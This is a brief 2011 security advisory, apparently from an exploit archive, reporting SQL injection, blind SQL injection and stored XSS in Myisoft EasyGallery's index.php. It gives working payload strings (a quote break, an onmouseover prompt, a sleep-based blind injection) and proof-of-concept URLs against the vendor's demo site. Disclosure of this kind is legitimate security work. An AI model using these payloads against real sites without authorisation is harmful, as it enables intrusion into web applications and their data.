Myisoft EasyGallery Cross Site Scripting / SQL Injection

2011.09.06

Credit: Eyup CELIK

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: MYISOFT EasyGallery SQL Injection - Blind SQL  
Injection - Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

SQL Injection, Blind SQL Injection and XSS can be done using the command input

Vulnerable Page:
index.php


Example:
index.php?do=<SQL Injection Code>&page=register&PageSection=0
index.php?catid=<SQL Injection Code>&page=category&PageSection=0
index.php/<XSS Code>
index.php?Go=Go&page=search&search=<Blind SQL Injection>


Exploit:
index.php?catid=1'&page=category&PageSection=0
index.php/%27onmouseover=prompt(932505)%3E
index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 --


POC:
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?catid=1'&page=category&PageSection=0
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php/%27onmouseover=prompt(932505)%3E
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1  
--



Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Myisoft EasyGallery Cross Site Scripting / SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.